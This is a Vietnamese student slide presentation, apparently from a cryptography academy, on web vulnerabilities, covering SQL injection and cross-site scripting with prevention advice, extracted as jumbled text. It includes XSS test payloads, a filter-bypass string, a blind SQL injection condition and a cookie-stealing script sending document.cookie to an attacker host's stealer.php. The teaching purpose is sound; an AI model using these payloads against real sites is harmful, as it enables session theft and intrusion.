Tìm hiểu lỗ hổng web cách phòng chống Thực hiện: Vũ Trung Kiên Lê Thị Liên Nguyễn Phương Duy Lớp : AT9c Trường: HV kỹ thuật Mật mã Tóm tắt nội dung • • • • Tổng quan website Lỗ hổng Injection Lỗ hổng XSS Demo khai thác lỗ hổng SQL Injection Tổng quan website Nội dung chính: 1, Mô tả website cách hoạt động 2, Các dịch vụ ứng dụng web 3, Các lỗi bảo mật thông dụng web 1, MÔ TẢ WEBSITE VÀ CÁCH HOẠT ĐỘNG Website gì? • Website “trang web” mạng internet • Là nơi giới thiệu thông tin, hình ảnh doanh nghiệp sản phẩm, dịch vụ doanh nghiệp (hay giới thiệu thông tin gì) ĐỂ TẠO NÊN WEBSITE CẦN YẾU TỐ CƠ BẢN: • Cần phải có tên miền (domain) • Nơi lưu trữ website (hosting) • Nội dung trang thông tin (web page) Thế tên miền • Tên miền địa website, internet tồn địa (tức tồn tên miền) • Có loại tên miền: + Tên miền Quốc tế: tên miền có dạng com; net; org; biz; name + Tên miền Việt Nam: tên miền có dạng: vn; com.vn; net.vn; org.vn; gov.vn Một website lưu trữ đâu?  Dữ liệu thông tin website phải lưu trữ máy tính (máy chủ – server) hoạt động kết nối với mạng internet  Một server lưu trữ nhiều tên website, server bị cố không c Ó thể truy cập website lưu trữ server thời điểm Nội dung trang thông tin Nội dung trang thông tin thiết kế hiển thị theo cách:  Website động  Website tĩnh 10 Reflected XSS Send URL victim attcker Request page website victim Webserver returns the page victim ● website kẻ công gắn thêm đoạn mã độc URL vào website gửi đến nạn nhân, nạn nhân truy cập vào URL bị dính mã độc 40 5.Phương pháp kiểm tra XSS ● Lỗi XSS thường xuất chỗ mà người dùng nhập liệu vào nhận thông báo trả từ website khung search, comment, result, webform 41 42 Cách 1: ● Trong khung tìm kiếm search, bạn nhập “error XSS”, kết trả là: Không tìm thấy kết cho “error XSS” “error XSS” kết không tồn Your search for “error XSS” is not vaild Hay kết trả có “error XSS” 99% site bị dính lỗi – – – 43 Cách ● Nhập đoạn script sau alert(“XSS”) Nếu trang web khung thông báo sau site bị lỗi XSS 44 Cách 3: kĩ thuật bypass ● alert(“hello world”) – – alert(String.fromCharCode(104,101,108 ,108,111,32,119,111,114,108,100,33)) >alert(“hello world”) 45 Tấn công ● ● Để công, hacker chèn mã độc mà họ viết rùi chèn lên chỗ có lỗi XSS Tùy vào trường hợp cụ thể họ chèn Flash, thẻ iframe ( HTML), URL chứa mã độc dẫn đường link tới web hacker 46 Ví dụ: ● File stealer.php – – – – – – ● Flie logs.txt rỗng chứa cookie victim 47 ● ● Sau có file họ chuẩn bị hosting, ví dụ http://www.attacker.net up file lên host Khi hacker có đoạn script ăn cắp cookie: location.href=’http://www.attacker.n et/Stealer.php? cookie=’+document.cookie; 48 ● ● Giả sử site dính lỗi http:// www.sitebiloi.com hacker chèn đoạn script vào chỗ xác định lỗi XSS Công việc họ ngồi chờ victim truy cập vào dùng tiện ích add-on cookie để login 49 Phòng chống XSS ● ● 7.1 Đối với người thiết kế phát triển web 7.2 Đối với người dùng 50 7.1 Người phát triển web ● ● ● ● Chỉ chấp nhận yếu tố hợp lệ theo yêu cầu công việc lập trình web Liên tục kiểm tra lọc liệu đầu vào Tạo danh sách thẻ HTML phép sử dụng Xóa bỏ thẻ đóng thẻ comment, coi đoạn trích dẫn Vẫn cho phép kí tự đặc biệt phải mã hóa trước in 51 ● ● ● ● Sử dụng thêm lọc code để loại bỏ kí tự đặc biệt từ đầu vào(anti-xss filter, thư viện HTML Purifier ) Lọc dấu nháy đơn, nháy kép Lọc bất kí đoạn mã JavaScript, VBScript, Flash Related Chuyển đổi kí tự sau thẻ input sinh ra: – – – – – – “” = “>” “(“ = “(” “)” = “)” “#” = “#” “&” = “&” 52 Đối với người dùng ● ● ● ● Lựa chọn trình duyệt web tốt firefox, chrome, thường xuyên cập nhật phiên Không click vào đường link không tin tưởng email lướt web Sử dụng công cụ plug-in hữu ích cho trình duyệt web để thông báo ngăn chặn mã độc hại thực thi Có thể vô hiệu hóa tính Flash, ActiveX, QuickTime, JavaScript để lướt web an toàn 53 Thank you ! 54 [...]... thị một trang một cách bình thường, trong khi: SELECT booktitle FROM booklist WHERE bookId = 'OOk14cd' AND 1=2; sẽ hiển thị một nội dung khác hoặc không hiển thị gì 28 Cách phòng chống sqli ● Tránh viết SQL code trong ứng dụng ● Kiểm soát dữ liệu đầu vào ● Chuẩn hóa dữ liệu ● Có các biện pháp bảo vệ Database ● Bảo về từ nền tảng hệ thống 29 Demo khai thác lỗ hổng sqli 30 Tìm hiểu về lỗ hổng Cross-site... Injection Là 1 dạng phổ biến của Injection Là 1 lỗ hổng mà rất nhiều các website bị hacker khai thác và tấn công 17 Lỗ Hổng Cross-Site Scripting - XSS 18  Cross-Site Scripting (gọi tắt là XSS thay vì CSS để tránh nhầm lẫn với CSS – Casscading Style Sheet của HTML )– là một trong những lỗ hổng của Web Application phổ biến nhất hiên nay, băng cách chèn vào các website động (ASP, PHP, CGI,…)  Những thẻ HTML,... dạng nào đều có thể có nguy bị tấn công lỗ hổng bảo mật 14 Các lỗ hổng phổ biến: Lỗ Hổng Injection 15 Injection là gì? • • • Là một dạng đặc biệt được lan rộng và là dạng nguy hiểm trong sự tấn công Là lỗ hổng mà tin tặc có thể tấn công hoặc thay đổi mã thông qua ứng dụng web Bằng việc cẩn thận gắn các mã độc vào cái tham biến, tin tắc có thể trick ứng dụng web thông qua việc chuyển tiến các truy vấn... trạng và mức độ nguy hiểm XSS 3 Nguyên lý hoạt động của XSS 4 Phân loại XSS 5 Phương pháp kiểm tra lỗi 6 Tấn công 7 Biện pháp phòng chống 32 1 XSS là gì ? ● XSS ( Cross-Site Scripting) là một trong những lỗ hổng của Web Application phổ biến nhất hiện nay cho phép hacker chạy các client side scripts (HTML, Flash, và đặc biệt là JavaScript) của họ khi có người khác truy cập vào trang web 33 2 Hiện trạng và. .. cơ sở dữ liệu và không có công cụ quản lí thông tin trên website + Ít thay đổi nội dung +Thông thường website tĩnh được thiết kế bằng các phần mềm như FrontPage, Dreamwaver, 11 2, Các dịch vụ và ứng dụng trên nền web  Những ứng dụng viết trên nền web không chỉ được gọi là một phần của website nữa, giờ đây chúng được gọi là phần mềm viết trên nền web  Có rất nhiều phần mềm chạy trên nền web như Google... Các lỗi sqli thường gặp ● Lỗi bảo mật bên trong máy chủ cơ sở dữ liệu: - Đôi khi lỗ hổng có thể tồn tại chính trong phần mềm máy chủ cơ sở dữ liệu - Điều này có thể giúp cho kẻ tấn công thực hiện được sqli ● Blind SQL injection: Lỗi này tồn tại ngay trong ứng dụng web, nó sẽ gây ra sự sai khác nội dung của 1 trang bị lỗi sqli 27 Các lỗi sqli thường gặp ● Thay đổi giá trị điều kiện truy vấn: Dạng lỗi... chạy trên nền web: + Mọi người đều có trình duyệt và bạn chỉ cần trình duyệt chạy phần mềm + Phần mềm luôn luôn được cập nhật vì chúng chạy trên server + Luôn sẵn sàng 24/7 + Dễ dàng backup dữ liệu thường xuyên + Có thể truy cập mọi lúc, mọi nơi, miễn là bạn có mạng + Chi phí triển khai cực rẻ so với phần mềm chạy trên Desktop 13 3, Các lỗi bảo mật thông dụng trên web Lỗ hổng là gì?  Lỗ hổng là các... trình hợp pháp với các lỗ hổng bảo mật có nguy cơ đưa đến một số rủi ro cho phép tin tặc có thể có ý định tấn công hoặc thay đổi mã thông qua ứng dụng web tới một hệ thông khác  Toàn bộ những dòng scripts được viết bằng Perl, Python và các ngôn ngữ khác có thể được áp dụng đối với những người thiết kế web ở trình độ không cao và thực thi nó trên hệ thông  Bất kì khi nào một ứng dụng web sử dụng một công... Website động (Dynamic website) + Là website có cơ sở dữ liệu, được cung cấp công cụ quản lí website (Admin Tool) + Linh hoạt và có thể cập nhật thông tin thường xuyên, quản lí các thành phần trên website dễ dàng + Thường được viết bằng các ngôn ngữ lập trình như PHP, Asp.net, JSP, …., quản trị Cơ sở dữ liệu bằng SQL hoặc MySQL  Website tĩnh + Do người lập trình băng... Flash nguy hiểm có khả năng đánh cắp thông tin quan trọng như cookies, mật khẩu, password…của những người đã truy cập vào website bị dính lỗi XSS 19 SQL injection ● Là 1 lỗi phổ biến nhất của Injection ● Lỗi được hacker thường xuyên khai thác 20 Thống kê ● Sql injection là 21 Tại sao lại có lỗi Sqli? ● Chủ yếu là do người lập trình viết SQL code trong ứng dụng string cmdStr = "INSERT INTO Customer(Name, Address, Email, Phone) VALU